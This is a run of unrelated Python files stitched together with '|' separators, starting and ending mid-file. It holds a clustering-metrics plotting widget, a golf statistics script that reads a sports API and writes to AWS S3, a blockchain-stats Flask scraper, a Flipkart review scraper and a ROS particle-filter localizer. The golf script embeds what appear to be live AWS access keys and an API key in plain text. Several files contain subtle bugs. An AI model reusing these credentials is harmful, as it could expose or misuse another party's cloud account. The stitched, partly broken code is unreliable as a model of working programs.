['val_calinski_harabasz', 'val_davies_bouldin'],
['silhouette', 'davies_bouldin'],
['val_silhouette', 'val_davies_bouldin'],
['calinski_harabasz', 'silhouette'],
['val_calinski_harabasz', 'val_silhouette']
]
self.params_select = widgets.ToggleButtons(
options=[
('All', ''),
('PSD method', 'psd_method'),
('Fs max', 'fs_max'),
('Norm time', 'norm'),
('FFT bin size', 'fft_bin_size'),
('Norm freq', 'normf')
],
value='',
description='Selection',
)
self.filter_select = widgets.ToggleButtons(
options=[
('All', ''),
('Welch', 'welch'),
('Multitaper', 'multitaper')
],
value='',
description='Filter',
)
self.data = self.data_select()
self.data_multi = self.data_select(multi=True)
self.fig_widgets = self.plot_setup()
self.fig_widgets_multi = self.plot_setup(multi=True)
self.image_layout = {'width': str(850)+'px' }
self.fig_widgets_combo = []
self.fig_widgets_multi_combo = []
for fig_widgets, fig_widgets_combo in [
[self.fig_widgets, self.fig_widgets_combo],
[self.fig_widgets_multi, self.fig_widgets_multi_combo]
]:
for row_idx in range(int(len(fig_widgets)/2)):
fig_widgets_combo += [
widgets.HBox(
[
fig_widgets[2*row_idx],
fig_widgets[2*row_idx+1],
# widgets.Image(
# disabled=True,
# layout=self.image_layout
# )
],
layout={'flex_flow':'row wrap'}
)
]
display(widgets.VBox([self.params_select, self.filter_select]))
display(widgets.VBox(self.fig_widgets_combo))
display(widgets.VBox(self.fig_widgets_multi_combo))
self.params_select.observe(self.plot_refresh, names='value')
self.filter_select.observe(self.plot_refresh, names='value')
def plot_setup(self, multi=False):
if multi:
data = self.data_multi
else:
data = self.data
plot_widgets = []
for idx_data, (my_name, my_data) in enumerate(data):
trace = []
for my_idx, (my_label, my_x, my_y, my_text) in enumerate(my_data):
color = rgb_to_rgba(self.colors_ref[my_idx], 0.5)
trace += [go.Scatter(
x=my_x,
y=my_y,
mode='markers',
text=my_text,
marker={
'color': color,
'size': 10
},
name=my_label
)]
if multi:
my_title = my_name[0].split(' (')[0] + ' vs ' + my_name[1].split(' (')[0]
if 'Validation' in my_name[0]:
my_title += ' (Validation)'
my_metric_x, my_metric_y = self.my_metrics_multi[idx_data]
my_title_x = self.my_metrics_ref[my_metric_x].split(' Validation')[0]
my_title_y = self.my_metrics_ref[my_metric_y].split(' Validation')[0]
else:
my_title = my_name.split(' (')[0]
if 'Validation' in my_name:
my_title += ' (Validation)'
my_title_x = 'Sorted params'
my_title_y = my_name.split(' Validation')[0]
layout = {
'title': my_title,
'hovermode': 'closest',
'xaxis': {'title': my_title_x},
'yaxis': {'title': my_title_y},
'width': 500,
'showlegend': True
}
plot_widgets += [go.FigureWidget(data=trace, layout=layout)]
return plot_widgets
def plot_refresh(self, change):
self.data = self.data_select()
self.data_multi = self.data_select(multi=True)
for fig_widgets, data in [
[self.fig_widgets, self.data],
[self.fig_widgets_multi, self.data_multi]
]:
for my_data_idx, (_, my_data) in enumerate(data):
fig_widgets[my_data_idx].data = []
for my_idx, (my_label, my_x, my_y, my_text) in enumerate(my_data):
color = rgb_to_rgba(self.colors_ref[my_idx], 0.5)
fig_widgets[my_data_idx].add_trace(go.Scatter(
x=my_x,
y=my_y,
mode='markers',
text=my_text,
marker={
'color': color,
'size': 10
},
name=my_label
))
def data_filter(self):
my_stats_list = list(self.stats_m)
if self.params_select.value=='':
my_stats_keys = {'All': my_stats_list}
my_labels = ['All']
else:
my_stats_keys = self.selections[self.params_select.value].copy()
my_labels = self.labels[self.params_select.value]
if self.filter_select.value!='':
for label in my_stats_keys:
my_stats_keys[label] = [
key for key in my_stats_keys[label]
if key in self.selections['psd_method'][self.filter_select.value]
]
return my_stats_list, my_stats_keys, my_labels
def data_select(self, multi=False):
my_stats_list, my_stats_keys, my_labels = self.data_filter()
data = []
if multi:
for my_metric_x, my_metric_y in self.my_metrics_multi:
my_name_x = self.my_metrics_ref[my_metric_x]
my_name_y = self.my_metrics_ref[my_metric_y]
my_name = (my_name_x, my_name_y)
my_data = []
for my_label in my_labels:
my_stats_label = [
key for key in my_stats_list
if key in my_stats_keys[my_label]
]
my_x = [
self.stats_m[key][my_metric_x] for key in my_stats_label
]
my_y = [
self.stats_m[key][my_metric_y] for key in my_stats_label
]
my_text = [key for key in my_stats_label]
my_data += [[my_label, my_x, my_y, my_text]]
data += [[my_name, my_data]]
else:
for my_metric in self.my_metrics:
my_name = self.my_metrics_ref[my_metric]
idx_sort = np.argsort([
self.stats_m[key][my_metric] for key in my_stats_list
])
if my_metric in ['davies_bouldin', 'val_davies_bouldin']:
idx_sort = idx_sort[::-1]
my_stats_sorted = [my_stats_list[idx] for idx in idx_sort]
my_data = []
for my_label in my_labels:
my_x = [
idx_key for idx_key, key in enumerate(my_stats_sorted)
if key in my_stats_keys[my_label]
]
my_y = [
self.stats_m[key][my_metric] for key in my_stats_sorted
if key in my_stats_keys[my_label]
]
my_text = [
key for key in my_stats_sorted
if key in my_stats_keys[my_label]
]
my_data += [[my_label, my_x, my_y, my_text]]
data += [[my_name, my_data]]
return data
class CacheLoader:
def __init__(self, base_path):
self.base_path = base_path
self.stats_m = {}
self.sources = {}
for item in os.listdir(self.base_path):
path = os.path.join(self.base_path, item)
if os.path.isdir(path):
files = mod_common_utils.list_cache(path)
if files:
self.sources[path] = files
self.source_select = widgets.Dropdown(
options=['']+natsorted(self.sources),
value='',
description='Source'
)
self.source_out = widgets.Output()
display(widgets.HBox([
self.source_select,
self.source_out
]))
self.source_select.observe(self.load_source, names='value')
self.widgets = ([self.source_select])
def load_source(self, change):
if self.source_select.value!='':
path = self.source_select.value
self.stats_m = {}
self.source_out.clear_output()
with self.source_out:
print('Loading...')
for name in self.sources[path]:
my_stats = mod_common_utils.from_cache(name, path)
for key in my_stats:
self.stats_m[key] = my_stats[key]
self.stats_m = mod_common_utils.stats_eval(self.stats_m)
self.source_out.clear_output()
with self.source_out:
print('Loaded data from', path) |
import requests
import json
import time
import math
from boto.s3.connection import S3Connection
from boto.s3.key import Key
tournament_name = 'The Masters'
year = 2015
# get tournament schedule from AWS
c = S3Connection('AKIAIQQ36BOSTXH3YEBA','cXNBbLttQnB9NB3wiEzOWLF13Xw8jKujvoFxmv3L')
b = c.get_bucket('public.tenthtee')
k = Key(b)
k1 = Key(b)
k2 = Key(b)
rs = b.list()
keys = []
for key in rs:
keys.append(key.name)
k.key = 'sportsData/' + str(year) + '/schedule.json'
schedule_string = k.get_contents_as_string()
schedule = json.loads(schedule_string)
# get tournament id
for tournament in schedule['tournaments']:
if tournament['name'] == tournament_name:
# uncomment line below to identify the tournament names
# print tournament['name'],tournament['id']
# if tournament['name'] == target_tournament: break
# identify tournament to get api
#if tournament['name'] == tournament_name:
tournament_id = tournament['id']
print tournament_id
# HOLE STATS
sports_data_key = 'd6aw46aafm49s5xyc2bj8vwr'
request_string = 'http://api.sportsdatallc.org/golf-t1/hole_stats/pga/' + str(year) + '/tournaments/' + tournament_id + '/hole-statistics.json?api_key=' + sports_data_key
r = requests.get(request_string)
hole_stats = r.json()
hole_stats = json.dumps(hole_stats)
# save hole_stats to AWS S3
k.key = 'sportsData/' + str(year) + '/' + tournament_name + '/hole_stats.json'
k.set_contents_from_string(hole_stats)
print 'hole stats'
# SCORECARDS
for rd in [1,2,3,4]:
# use tournament id to get round scores
time.sleep(1)
request_string = 'http://api.sportsdatallc.org/golf-t1/scorecards/pga/' + str(year) + '/tournaments/' + tournament_id + '/rounds/'+ str(rd) + '/scores.json?api_key=' + sports_data_key
r = requests.get(request_string)
scorecards = r.json()
scorecards = json.dumps(scorecards)
# save hole_stats to AWS S3
k.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/scorecards.json'
k.set_contents_from_string(scorecards)
time.sleep(3)
print 'scorecards - rd ' + str(rd)
# TEETIMES
request_string = 'http://api.sportsdatallc.org/golf-t1/teetimes/pga/' + str(year) + '/tournaments/' + tournament_id + '/rounds/'+ str(rd) + '/teetimes.json?api_key=' + sports_data_key
r = requests.get(request_string)
teetimes = r.json()
teetimes = json.dumps(teetimes)
# save tee times to AWS S3
k.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/teetimes.json'
k.set_contents_from_string(teetimes)
time.sleep(3)
print 'tee times - rd ' + str(rd)
# HOLE AVERAGES
# use tournament id to get AWS scorecards
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/scorecards.json'
scorecards_string = k1.get_contents_as_string()
scorecards = json.loads(scorecards_string)
if 'round' not in scorecards: continue
if 'players' not in scorecards['round']: continue
hole_averages = {}
hole_averages['tournament'] = tournament_name
hole_averages['id'] = tournament_id
hole_averages['round'] = rd
hole_averages['courses'] = []
# create courses set
for player in scorecards['round']['players']:
course = player['course']['name']
if course not in hole_averages['courses']:
hole_averages['courses'].append(player['course']['name'])
for course in hole_averages['courses']:
hole_averages[course] = {}
hole_averages[course]['holes'] = {}
for hole_num in xrange(1,18+1):
hole_averages[course]['holes'][hole_num] = {}
hole_averages[course]['holes'][hole_num]['total_strokes'] = 0
hole_averages[course]['holes'][hole_num]['num_players'] = 0
for player in scorecards['round']['players']:
if player['course']['name'] == course:
for hole in player['scores']:
hole_number = hole['number']
hole_averages[course]['holes'][hole_number]['total_strokes'] += int(hole['strokes'])
hole_averages[course]['holes'][hole_number]['num_players'] += 1
for hole_num in xrange(1,18+1):
hole_averages[course]['holes'][hole_num]['average'] = float(hole_averages[course]['holes'][hole_num]['total_strokes']) / float(hole_averages[course]['holes'][hole_num]['num_players'])
# save to AWS S3
hole_averages = json.dumps(hole_averages)
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/hole_averages.json'
k2.set_contents_from_string(hole_averages)
print 'hole averages - rd ' + str(rd)
time.sleep(1)
# STROKES GAINED
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/scorecards.json'
if k1.key not in keys: continue
scorecards_string = k1.get_contents_as_string()
scorecards = json.loads(scorecards_string)
# use tournament id to get AWS hole averages
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/hole_averages.json'
if k2.key not in keys: continue
hole_averages_string = k2.get_contents_as_string()
hole_averages = json.loads(hole_averages_string)
if 'round' not in scorecards: continue
if 'players' not in scorecards['round']: continue
strokes_gained = {}
strokes_gained['tournament'] = tournament_name
strokes_gained['id'] = tournament_id
strokes_gained['round'] = rd
# create courses set
for player in scorecards['round']['players']:
player_name = player['first_name'] + ' ' + player['last_name']
strokes_gained[player_name] = {}
course = player['course']['name']
strokes_gained[player_name]['course'] = course
strokes_gained[player_name]['rd_strokes_gained'] = 0
strokes_gained[player_name]['num_holes'] = 0
for score in player['scores']:
hole_num = score['number']
strokes_gained[player_name][hole_num] = {}
strokes_gained[player_name][hole_num]['strokes'] = float(score['strokes'])
if strokes_gained[player_name][hole_num]['strokes'] == 0: continue
strokes_gained[player_name][hole_num]['average'] = float(hole_averages[course]['holes'][str(hole_num)]['average'])
strokes_gained[player_name][hole_num]['strokes_gained'] = float(hole_averages[course]['holes'][str(hole_num)]['average']) - float(score['strokes'])
strokes_gained[player_name]['rd_strokes_gained'] += float(strokes_gained[player_name][hole_num]['strokes_gained'])
if player_name == 'Will MacKenzie':
print player_name, hole_num, score['strokes'],hole_averages[course]['holes'][str(hole_num)]['average'], strokes_gained[player_name][hole_num]['strokes_gained'], strokes_gained[player_name]['rd_strokes_gained']
strokes_gained[player_name]['num_holes'] += 1
if player_name == 'Rory McIlroy':
print "rd_strokes_gained: ", rd, strokes_gained[player_name]['rd_strokes_gained']
# save to AWS S3
strokes_gained = json.dumps(strokes_gained)
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/strokes_gained.json'
k2.set_contents_from_string(strokes_gained)
print 'strokes gained - rd ' + str(rd)
time.sleep(1)
# VARIANCES
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/scorecards.json'
if k1.key not in keys: continue
scorecards_string = k1.get_contents_as_string()
scorecards = json.loads(scorecards_string)
# use tournament id to get AWS scorecards
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/hole_averages.json'
if k2.key not in keys: continue
hole_averages_string = k2.get_contents_as_string()
hole_averages = json.loads(hole_averages_string)
if 'round' not in scorecards: continue
if 'players' not in scorecards['round']: continue
variances = {}
variances['tournament'] = tournament_name
variances['id'] = tournament_id
variances['round'] = rd
# create courses set
for player in scorecards['round']['players']:
player_name = player['first_name'] + ' ' + player['last_name']
variances[player_name] = {}
course = player['course']['name']
variances[player_name]['course'] = course
variances[player_name]['rd_variance'] = 0
variances[player_name]['num_holes'] = 0
for score in player['scores']:
hole_num = score['number']
variances[player_name][hole_num] = {}
variances[player_name][hole_num]['strokes'] = score['strokes']
if variances[player_name][hole_num]['strokes'] == 0: continue
variances[player_name][hole_num]['average'] = hole_averages[course]['holes'][str(hole_num)]['average']
variances[player_name][hole_num]['variance'] = math.pow((float(hole_averages[course]['holes'][str(hole_num)]['average']) - float(score['strokes'])),2)
variances[player_name]['rd_variance'] += float(variances[player_name][hole_num]['variance'])
variances[player_name]['num_holes'] += 1
# save to AWS S3
strokes_gained = json.dumps(variances)
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/variances.json'
k2.set_contents_from_string(strokes_gained)
print 'variances - rd ' + str(rd)
time.sleep(1)
print year, tournament_name, rd
time.sleep(1)
# SCORE DISTRIBUTION
scores = {}
scores['tournament'] = tournament_name
scores['id'] = tournament_id
scores['courses'] = []
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(1) + '/scorecards.json'
scorecards_string = k1.get_contents_as_string()
scorecards = json.loads(scorecards_string)
if 'round' not in scorecards: continue
if 'players' not in scorecards['round']: continue
# create courses set
for player in scorecards['round']['players']:
course = player['course']['name']
if course not in scores['courses']:
scores['courses'].append(player['course']['name'])
for course in scores['courses']:
scores[course] = {}
scores[course]['holes'] = {}
for hole_num in xrange(1,18+1):
scores[course]['holes'][hole_num] = {}
scores[course]['holes'][hole_num]['scores'] = []
scores[course]['holes'][hole_num]['occurences'] = {}
scores[course]['holes'][hole_num]['percentages'] = {}
for rd in [1,2,3,4]:
# use tournament id to get AWS scorecards
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/scorecards.json'
scorecards_string = k1.get_contents_as_string()
scorecards = json.loads(scorecards_string)
if 'round' not in scorecards: continue
if 'players' not in scorecards['round']: continue
for player in scorecards['round']['players']:
if player['course']['name'] == course:
for hole in player['scores']:
hole_number = hole['number']
scores[course]['holes'][hole_number]['scores'].append(int(hole['strokes']))
for hole_num in xrange(1,18+1):
for stroke_num in xrange(1,9):
scores[course]['holes'][hole_num]['occurences'][stroke_num] = scores[course]['holes'][hole_num]['scores'].count(stroke_num)
scores[course]['holes'][hole_num]['percentages'][stroke_num] = float(scores[course]['holes'][hole_num]['occurences'][stroke_num]) / float(len(scores[course]['holes'][hole_number]['scores']))
# save to AWS S3
scores = json.dumps(scores)
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/scores.json'
k2.set_contents_from_string(scores)
print 'score distributions'
# STROKES GAINED BY TOURNAMENT
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/1/scorecards.json'
if k1.key not in keys: continue
scorecards_string = k1.get_contents_as_string()
scorecards = json.loads(scorecards_string)
strokes_gained = {}
strokes_gained['tournament'] = tournament_name
strokes_gained['id'] = tournament_id
if 'players' not in scorecards['round']: continue
# create courses set
for player in scorecards['round']['players']:
player_name = player['first_name'] + ' ' + player['last_name']
strokes_gained[player_name] = {}
strokes_gained[player_name]['tournament_strokes_gained'] = 0
strokes_gained[player_name]['tournament_num_holes'] = 0
for rd in [1,2,3,4]:
# use tournament id to get AWS scorecards
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/strokes_gained.json'
if k1.key not in keys: continue
rd_strokes_gained = k1.get_contents_as_string()
rd_strokes_gained = json.loads(rd_strokes_gained)
if player_name not in rd_strokes_gained: continue
strokes_gained[player_name]['tournament_strokes_gained'] += float(rd_strokes_gained[player_name]['rd_strokes_gained'])
strokes_gained[player_name]['tournament_num_holes'] += float(rd_strokes_gained[player_name]['num_holes'])
# save to AWS S3
strokes_gained = json.dumps(strokes_gained)
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/strokes_gained.json'
k2.set_contents_from_string(strokes_gained)
print 'strokes gained by tournament'
# VARIANCES BY TOURNAMENT
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/1/scorecards.json'
if k1.key not in keys: continue
scorecards_string = k1.get_contents_as_string()
scorecards = json.loads(scorecards_string)
variances = {}
variances['tournament'] = tournament_name
variances['id'] = tournament_id
if 'players' not in scorecards['round']: continue
# create courses set
for player in scorecards['round']['players']:
player_name = player['first_name'] + ' ' + player['last_name']
variances[player_name] = {}
variances[player_name]['tournament_variance'] = 0
variances[player_name]['tournament_num_holes'] = 0
for rd in [1,2,3,4]:
# use tournament id to get AWS scorecards
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/variances.json'
if k1.key not in keys: continue
rd_strokes_gained = k1.get_contents_as_string()
rd_strokes_gained = json.loads(rd_strokes_gained)
if player_name not in rd_strokes_gained: continue
variances[player_name]['tournament_variance'] += float(rd_strokes_gained[player_name]['rd_variance'])
variances[player_name]['tournament_num_holes'] += float(rd_strokes_gained[player_name]['num_holes'])
#print player_name,variances[player_name]['tournament_variances'], variances[player_name]['tournament_num_holes']
# save to AWS S3
strokes_gained = json.dumps(variances)
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/variances.json'
k2.set_contents_from_string(strokes_gained)
print 'variance by tournament' |
from wargame.attackoftheorcs import AttackOfTheOrcs
# Main类
if __name__ == '__main__':
game = AttackOfTheOrcs()
# 开始游戏
game.play() |
import urllib
import json
from bs4 import BeautifulSoup
from flask import Flask
statDims = {
"Blocks Mined": "blocks_mined",
"Time Between Blocks": "time_between_blocks",
"Bitcoins Mined": "bitcoins_mined",
"Total Transaction Fees": "total_transaction_fees",
"No. of Transactions": "num_transactions",
"Total Output Volume":"total_output_volume",
"Estimated Transaction Volume": "estimated_transaction_volume",
"Estimated Transaction Volume (USD)": "estimated_transaction_volume_usd",
"Market Price": "market_price",
"Trade Volume": "trade_volume_usd",
"Trade Volume": "trade_volume_btc",
"Total Miners Revenue": "total_miners_revenue",
'%% earned from transaction fees': "percent_transaction_fees",
'%% of transaction volume': "percent_transaction_volume",
'Cost per Transaction': "cost_per_transaction",
'Difficulty': "difficulty",
'Hash Rate': "hash_rate"
}
json_data = {}
app = Flask(__name__)
@app.route("/stats")
def stats():
contenturl = "https://blockchain.info/stats"
content = urllib.urlopen(contenturl).read()
soup = BeautifulSoup(content, "html.parser")
table_data = soup.find_all('td')
curDim = ""
for row in table_data:
if row.string is not None and row.string in statDims.keys():
curDim = row.string
elif curDim != "" and row.string is not None:
json_data[statDims[curDim]] = row.string
elif not row.string is None:
row.string
return json.dumps(json_data, indent=4)
if __name__ == "__main__":
app.run()
|
#web scrapping using html parser method
from bs4 import BeautifulSoup as bs
import requests
link='https://www.flipkart.com/portronics-harmonics-216-bluetooth-headset/product-reviews/itm56304ccc8e996?pid=ACCFHHWUEXCFBMST&lid=LSTACCFHHWUEXCFBMSTGHSLHL&marketplace=FLIPKART'
page=requests.get(link)
page
page.content
soup=bs(page.content,'html.parser')
soup
soup.prettify()
'''names=soup.find_all('span',class_='a-profile-name')
cust_name=[]
for i in range(0,len(names)):
cust_name.append(names[i].get_text())
cust_name
cust_name.pop(0)
cust_name'''
title=soup.find_all('p',class_='_2-N8zT')
title
review_title=[]
for i in range(0,len(title)):
review_title.append(title[i].get_text())
review_title
'''review_title[:]=[titles.lstrip('\n')for titles in review_title]
review_title
review_title[:]=[titles.rstrip('\n')for titles in review_title]
review_title'''
rating=soup.find_all('div',class_='_3LWZlK _1BLPMq')
rating
rate=[]
for i in range(0,len(rating)):
rate.append(rating[i].get_text())
rate
#rate.pop(0)
rate
review=soup.find_all('div',class_='t-ZTKy')
review
review_content=[]
for i in range(0,len(review)):
review_content.append(review[i].get_text())
review_content
'''review_content[:]=[reviews.lstrip('\n')for reviews in review_content]
review_content
review_content[:]=[reviews.rstrip('\n')for reviews in review_content]
review_content'''
#cust_name
review_title
rate
review_content
import pandas as pd
df=pd.DataFrame()
#df['Customer_Name']=cust_name
df['Review_title']=review_title
df['Ratings']=rate
df['Reviews']=review_content
df
df.to_csv(r'F:\MLP_SPYDER\headset_review2.csv',index=True)
|
#!/usr/bin/python
import Tkinter as tk
import ImageTk
import bisect
import numpy as np
from PIL import Image
import random
import rospy
import tf
import math
import Queue
import itertools
import colorsys
from threading import Timer
from nav_msgs.msg import Odometry
from sensor_msgs.msg import LaserScan
from p2os_msgs.msg import SonarArray
from geometry_msgs.msg import Quaternion
from std_msgs.msg import String
from functools import partial
from multiprocessing import Pool
from Utils import initialize_cspace
from Particle import *
def oval(x, y):
return x - 1, y - 1, x + 1, y + 1
class Localizer(tk.Frame):
def update_image(self):
self.mapimage = ImageTk.PhotoImage(self.themap)
self.canvas.create_image(2000 / 2, 700 / 2, image=self.mapimage)
def render_particles(self, root=None):
if self.no_flash_gui:
self.canvas.delete("particles")
for p in self.particles:
self.canvas.create_oval(oval(p.mx, p.my), tags="particles")
root.after(500, self.render_particles, root)
else:
self.reset_map()
for p in self.obs_points:
r, g, b = (255, 100, 0)
color = (int(r), int(g), int(b))
self.mappix[p[0], p[1]] = color
self.mappix[p[0]+1, p[1]] = color
self.mappix[p[0]+1, p[1]+1] = color
self.mappix[p[0], p[1]+1] = color
self.obs_points = []
for p in self.particles:
h = 0.33 * p.p
r, g, b = colorsys.hls_to_rgb(h, 127, -1)
color = (int(r), int(g), int(b))
self.mappix[p.mx, p.my] = color
self.update_image()
def reset_map(self):
self.themap = Image.open(self.mapfile, mode='r')
self.themap = self.themap.convert("RGB")
self.mapimage = ImageTk.PhotoImage(self.themap)
self.mappix = self.themap.load()
self.update_image()
def __init__(self, supplied_map, *args, **kwargs):
tk.Frame.__init__(self, *args, **kwargs)
self.master.title("Localizer")
self.master.minsize(width=2000, height=700)
self.mapfile = supplied_map
self.themap = Image.open(self.mapfile, mode='r')
self.themap = self.themap.convert("RGB")
self.mapimage = ImageTk.PhotoImage(self.themap)
self.mappix = self.themap.load()
self.canvas = tk.Canvas(self, width=2000, height=700)
self.map_on_canvas = self.canvas.create_image(2000 / 2, 700 / 2, image=self.mapimage)
self.canvas.pack()
self.pack()
self.render_flag = True
self.no_flash_gui = False
self.maparr = np.asarray(self.themap)
self.landmarks = [[-12.0, 12.0, 180], [10.8, 12.7, 180], [8, -0.5, 90], [-18.4, -8.9, 0], [-54.5, 7.6, 90], [8, -1.5, 270]]
#self.landmarks = [[8, -1.5, 270]]
#self.landmarks = [[-54.5, 7.6, 90]]
#self.landmarks = [[10.8, 12.7, 180], [8, -1.5, 270]]
#self.particles = Particle.scatter_near_test(100, self.landmarks, self.maparr, maintain_start_angle=True)
self.particles = Particle.scatter_near_landmarks(PARTICLES_PER_LANDMARK, self.landmarks, self.maparr, maintain_start_angle=True)
#self.particles = Particle.scatter_around_map(20000,self.maparr)
self.obs_points = []
self.render_particles()
# odom
self.ang_delta = 0
self.fwd_delta = 0
self.last_theta = 0.0
self.last_x = 0.0
self.last_y = 0.0
# sensors
self.laser_queue = Queue.LifoQueue()
self.odom_queue = Queue.LifoQueue()
self.count = 0
self.goal_pub = rospy.Publisher('/localized_pos', String, queue_size=1)
self.task_pool = Pool(processes=5)
def resample(self, count):
"""
Re-samples particles. Function gets rid of dead particles, normalizes probabilities
and then spreads out the probs in a [0,1] number line as sorted cumulative list.
Pick a random float in [0, 1] and use the corresponding particle at index to get a new particle.
Particles with higher probs have a larger "share" in the line and have a larger chance of being cloned.
:param count: the number of particles to resample.
:return:
"""
print 'Resampling ', count, 'new particles'
self.normalize_particles()
# Cumulative probabilities for weighted distribution
cumul_probs = [_.p for _ in self.particles]
cumul_probs = np.cumsum(cumul_probs)
# Re-sample particles with probability equivalent to weights
for _ in range(count):
rand_p = random.uniform(0, 1)
i = bisect.bisect_left(cumul_probs, rand_p)
try:
self.particles.append(self.particles[i].clone(self.maparr, with_noise=True))
except IndexError:
pass
def normalize_particles(self):
min_x = min(_.p for _ in self.particles)
max_x = max(_.p for _ in self.particles)
if min_x != max_x:
for i in range(len(self.particles)):
self.particles[i].p = (self.particles[i].p - min_x) / (max_x - min_x)
def remove_dead_particles(self, strategy=None):
self.particles = filter(lambda p: p.p > THRESHOLD, self.particles)
def odom_update(self, omsg):
self.odom_queue.put(omsg)
def get_movement(self):
omsg = self.odom_queue.get()
if omsg is None:
return None
self.odom_queue.queue[:] = []
x = omsg.pose.pose.position.x
y = omsg.pose.pose.position.y
q = (omsg.pose.pose.orientation.x,
omsg.pose.pose.orientation.y,
omsg.pose.pose.orientation.z,
omsg.pose.pose.orientation.w)
euler = tf.transformations.euler_from_quaternion(q)
d_theta = (self.last_theta - euler[2])
d_theta = (d_theta + math.pi % (2.0 * math.pi)) - math.pi
# print 'last', self.last_theta, 'new', euler[2], 'dtheta', d_theta
dx = self.last_x - x
dy = self.last_y - y
dist = math.sqrt(dx**2 + dy**2)
dist = dist if dist > 0.15 else 0
if dist > 0:
self.last_x = x
self.last_y = y
if abs(d_theta) < 0.08:
d_theta = 0
else:
self.last_theta = euler[2]
# todo -dtheta is hack. robot was turning in the opposite direction. Fix needed
return (x, y), dist, -d_theta, euler[2]
def update(self):
count = 0
while True:
start_time = rospy.get_time()
count += 1
mov = self.get_movement()
if mov is None:
continue
ox, oy = mov[0][0], mov[0][1]
dist, dtheta = mov[1], mov[2]
otheta = mov[3]
if dist == 0 and dtheta == 0:
continue
for p in self.particles:
p.move(dist, math.degrees(dtheta), self.maparr)
lmsg = self.get_laser_msg()
if lmsg is None:
continue
readings = self.get_robot_readings(lmsg)
step = 0.00158544606529
idx = [int(np.radians(dtheta)/step) for dtheta in range(0, 60, 2)]
rread = []
for i in idx:
if math.isnan(readings[i]):
rread.append(10.0)
else:
rread.append(readings[i])
for p in self.particles:
pread, locs = p.sense(self.maparr)
self.obs_points += locs
p.p *= prob_diff_readings(rread, pread)
for p in self.particles:
print(p.p)
end_time = rospy.get_time()
print("Time taken %d seconds"%(end_time -start_time))
centroid = self.converged_loc(strategy="centroid")
if centroid is not None:
extra_mov = self.get_movement()
nx, ny = extra_mov[0][0], extra_mov[0][1]
ntheta = extra_mov[3]
median_angle = math.radians(np.median([p.theta for p in self.particles])) % (2.0 * math.pi)
lx, ly = centroid[0], centroid[1]
xx = median_angle - otheta
adjust_x = nx * np.cos(xx) - ny * np.sin(xx) + lx
adjust_y = ny * np.sin(xx) + ny * np.cos(xx) + ly
adjust_theta = ntheta + xx
print("Converged at <%0.2f,%0.2f>@%0.2f"%(centroid[0], centroid[1], median_angle))
print("Adjusted convergence at <%0.2f,%0.2f>@%0.2f"%(adjust_x, adjust_y, adjust_theta))
#goal_str = '{0} {1} {2}'.format(centroid[0], centroid[1], median_angle)
goal_str = '{0} {1} {2}'.format(adjust_x, adjust_y, xx)
self.goal_pub.publish(goal_str)
self.normalize_particles()
self.remove_dead_particles()
self.resample_if_required()
self.render_particles()
def get_laser_msg(self):
msg = self.laser_queue.get()
self.laser_queue.queue[:] = []
return msg
def get_robot_readings(self, lmsg):
msg = self.laser_queue.get()
r = msg.ranges
return r
def resample_if_required(self):
if len(self.particles) < RESAMPLE_THRESHOLD:
self.resample(TOTAL_PARTICLES - len(self.particles))
def converged_loc(self, strategy="centroid"):
if strategy == "centroid":
coords = np.asarray([(p.x, p.y, p.theta) for p in self.particles])
sum_x = np.sum(coords[:, 0])
sum_y = np.sum(coords[:, 1])
sum_z = np.sum(coords[:, 2])
min_a = min([p.theta % 360 for p in self.particles])
max_a = max([p.theta % 360 for p in self.particles])
median_angle = np.median([p.theta for p in self.particles]) % 360
print("min angle %0.2f, max angle %0.2f, med angle %0.2f"%(min_a, max_a, median_angle))
centroid = sum_x / len(coords), sum_y / len(coords), sum_z / len(coords)
particles_near_centroid = len([1 for p in self.particles if p.d3_get_distance_to(*centroid) < 1])
if particles_near_centroid > CENTROID_THRESHOLD:
return centroid
else:
return None
else:
# Bounding box. Is not complete. How to eliminate outliers?
min_x, max_x, min_y, max_y = float('inf'), float('-inf'), float('inf'), float('-inf')
for p in self.particles:
if p.p == 0:
continue
min_x = min(min_x, p.x)
max_x = max(max_x, p.x)
min_y = min(min_y, p.y)
max_y = max(max_y, p.y)
width = max_x - min_x
height = max_y - min_y
area = width * height
return area < BOUNDING_BOX_AREA_CONVERGENCE
def laser_update(self, lmsg):
self.laser_queue.put(lmsg)
#def sonar_update(self, smsg):
# self.sonar_queue.put(smsg)
def main():
rospy.init_node("localize", anonymous=True)
root = tk.Tk()
initialize_cspace()
#l = Localizer('/home/stu12/s11/mhs1841/catkin_ws/src/hw1/src/scripts/project.png', master=root, height=700, width=2000)
# we are bad people
l = Localizer('/home/stu9/s4/bwb5381/project.png', master=root, height=700, width=2000)
#rospy.Subscriber("/r1/kinect_laser/scan", LaserScan, l.laser_update)
#rospy.Subscriber("/r1/odom", Odometry, l.odom_update)
rospy.Subscriber("/scan", LaserScan, l.laser_update)
rospy.Subscriber("/pose", Odometry, l.odom_update)
t = Timer(0.1, l.update)
t.start()
root.mainloop()
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import time
import pytest
from selenium import webdriver
@pytest.fixture(scope='module')
def webfront(agent):
